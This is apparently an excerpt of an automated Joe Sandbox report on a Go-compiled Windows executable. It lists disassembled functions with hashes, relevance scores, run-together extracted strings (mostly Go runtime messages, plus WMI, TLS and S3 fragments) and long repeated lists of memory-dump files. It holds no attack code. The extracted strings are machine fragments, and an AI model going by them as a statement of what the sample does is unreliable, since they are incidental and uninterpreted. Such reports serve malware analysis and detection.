TimeGMT Standard Timefractional secondCanSet() is falseEnvSe
              • API String ID: 0-2239762198
              • Opcode ID: 51e8a9d3bc94d89838530cd50e73752a156aedd7bcf3576fd8163d11b0b478b3
              • Instruction ID: 6627707142a4ae4fa5b5180e9174db6abafb087eac259bc7bb998ab2d650fe01
              • Opcode Fuzzy Hash: 51e8a9d3bc94d89838530cd50e73752a156aedd7bcf3576fd8163d11b0b478b3
              • Instruction Fuzzy Hash: 0E5104B4509345CFD314EF64D089BAEB7F4FB88304F50892EE88887312EB389985DB52
              Function 007C4F00 Relevance: 7.6, Strings: 6, Instructions: 114COMMON
              Download Yara Rule
              Strings
              • preempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptiontrace/breakpoint trapuser defined signal 1user defined signal 2link has been severedpackage , xrefs: 007C5092
              • preempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckruntime.gopanicadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDevic, xrefs: 007C507C
              • bad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOf, xrefs: 007C50B4
              • runtime: unexpected SPWRITE function all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typetimezone hour outside of range [0,23]failed to load environment config, %vUnsubscribeServiceChangeNotificationsg, xrefs: 007C5037
              • %, xrefs: 007C5040
              • in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/output errormultihop, xrefs: 007C5061
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/output errormultihop$%$bad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOf$preempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckruntime.gopanicadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDevic$preempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptiontrace/breakpoint trapuser defined signal 1user defined signal 2link has been severedpackage $runtime: unexpected SPWRITE function all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typetimezone hour outside of range [0,23]failed to load environment config, %vUnsubscribeServiceChangeNotificationsg
              • API String ID: 0-699477509
              • Opcode ID: 139d0e86edf152544f1c87c37ad99ebdf367ff76875c1b72408b01b6aec4e168
              • Instruction ID: 319610256e9089e29e74d1fc493e2c84b2f9b9c3d06f8d5e68f510be65581eb7
              • Opcode Fuzzy Hash: 139d0e86edf152544f1c87c37ad99ebdf367ff76875c1b72408b01b6aec4e168
              • Instruction Fuzzy Hash: B151B1B4608741DFC314EF68C199B6ABBE4FF89704F01885DE4898B352DB79E884DB52
              Function 00795AB0 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
              Download Yara Rule
              Strings
              • runtime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of me, xrefs: 00795B8C
              • checkmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscall, xrefs: 00795C5C
              • base of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcall, xrefs: 00795BFB
              • runtime: checkmarks found unexpected unmarked object obj=x-amz-copy-source-server-side-encryption-customer-key-md5sync: WaitGroup misuse: Add called concurrently with Waittls: Ed25519 public keys are not supported before TLS 1.2received record with version %x , xrefs: 00795B53
              • 9, xrefs: 00795B5C
              • objgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-0, xrefs: 00795C21
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: 9$base of ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcall$checkmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscall$objgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-0$runtime: checkmarks found unexpected unmarked object obj=x-amz-copy-source-server-side-encryption-customer-key-md5sync: WaitGroup misuse: Add called concurrently with Waittls: Ed25519 public keys are not supported before TLS 1.2received record with version %x $runtime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of me
              • API String ID: 0-287735659
              • Opcode ID: 5b39f50ce2dab5b5d77b208e6f528ca7a584eb600ab9354303ad7e363844bc69
              • Instruction ID: 1b3e4fb2f84e4aa3126fb8e02bc3d84388e23682a64ca77465ef272d412b85f4
              • Opcode Fuzzy Hash: 5b39f50ce2dab5b5d77b208e6f528ca7a584eb600ab9354303ad7e363844bc69
              • Instruction Fuzzy Hash: 0D41F3B4109745CFD342EF28C189B9EBBE0BF8A704F45886DE4D887352D7789948DB62
              Function 007A4850 Relevance: 7.6, Strings: 6, Instructions: 103COMMON
              Download Yara Rule
              Strings
              • X~, xrefs: 007A490D
              • scavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextrunt, xrefs: 007A49A1
              • pX~, xrefs: 007A494C
              • `Y~, xrefs: 007A4970
              • Z~, xrefs: 007A4994
              • , xrefs: 007A49AA
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: $ X~$ Z~$`Y~$pX~$scavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextrunt
              • API String ID: 0-2698103432
              • Opcode ID: eee02616f01d5f87f24414d7d445f62d96e9d416a2b4ca3203a77d32edf6135c
              • Instruction ID: 9ea2a3444fdca1a6975c13cadec0c8dcd226afb9b7b16ca9cd229d1108debff6
              • Opcode Fuzzy Hash: eee02616f01d5f87f24414d7d445f62d96e9d416a2b4ca3203a77d32edf6135c
              • Instruction Fuzzy Hash: B0412974611201CFD728EF15D0A0A6AB7E1FFC9304718866ED85A4B766DB39EC12CF41
              Function 007BED60 Relevance: 7.6, Strings: 6, Instructions: 98COMMON
              Download Yara Rule
              Strings
              • casfrom_Gscanstatus: gp->status is not in scan stateConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWerrors: *target must be interface or implement errortls: server selected unsupported protocol version %x, xrefs: 007BEE57
              • , oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=[ lockedm=interruptbus errorFindCloseLocalFreeMoveFileWWriteFileWSASendTontdll.dllWednesdaySeptember-07:00:00Z07:00:00ExecQueryParseBoolca_bundleus-east-, xrefs: 007BEDED, 007BEE94
              • casfrom_Gscanstatus:top gp->status is not in scan state is currently not supported for use in system callbacksSOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zonesbufio.Scanner: SplitFunc returns negative advance countreflect: internal error: invalid use of , xrefs: 007BEEFE
              • 7, xrefs: 007BEF07
              • runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function transport endpoint is already connected2006-01-02 15:04:05.999999999 -0700 MSTwmi: cannot load field %q into a %q: %sunable to get read client , xrefs: 007BEDCB
              • runtime: casfrom_Gscanstatus bad oldval gp=runtime:stoplockedm: lockedg (atomicstatus=methodValueCallFrameObjs is not in a moduleinterrupted system call should be restartedERROR: failed to load CSM configuration, %vbufio: tried to rewind past start of buffermu, xrefs: 007BEE72
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: , oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=[ lockedm=interruptbus errorFindCloseLocalFreeMoveFileWWriteFileWSASendTontdll.dllWednesdaySeptember-07:00:00Z07:00:00ExecQueryParseBoolca_bundleus-east-$7$casfrom_Gscanstatus: gp->status is not in scan stateConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWerrors: *target must be interface or implement errortls: server selected unsupported protocol version %x$casfrom_Gscanstatus:top gp->status is not in scan state is currently not supported for use in system callbacksSOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zonesbufio.Scanner: SplitFunc returns negative advance countreflect: internal error: invalid use of $runtime: casfrom_Gscanstatus bad oldval gp=runtime:stoplockedm: lockedg (atomicstatus=methodValueCallFrameObjs is not in a moduleinterrupted system call should be restartedERROR: failed to load CSM configuration, %vbufio: tried to rewind past start of buffermu$runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system calltraceback: unexpected SPWRITE function transport endpoint is already connected2006-01-02 15:04:05.999999999 -0700 MSTwmi: cannot load field %q into a %q: %sunable to get read client
              • API String ID: 0-3158602290
              • Opcode ID: e38f3e969572b1b00263d770ad6e8dde4deaf4e1df4ea9a1c48076ba43181ac9
              • Instruction ID: 14e1f6efa9d7c9812170008fb2b5a65241347aa8a694a4b93f6ff2c7c89f91f6
              • Opcode Fuzzy Hash: e38f3e969572b1b00263d770ad6e8dde4deaf4e1df4ea9a1c48076ba43181ac9
              • Instruction Fuzzy Hash: E94192B4509705DED301FF64C18A7AEBBE4AF88744F51882DE4C897352E7789888DB63
              Function 007994B0 Relevance: 6.6, Strings: 5, Instructions: 364COMMON
              Download Yara Rule
              Strings
              • flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nan, xrefs: 00799A27
              • @N|, xrefs: 007999B9
              • p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeup, xrefs: 00799A85
              • runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64, xrefs: 007999FE
              • != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase, xrefs: 00799A51
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
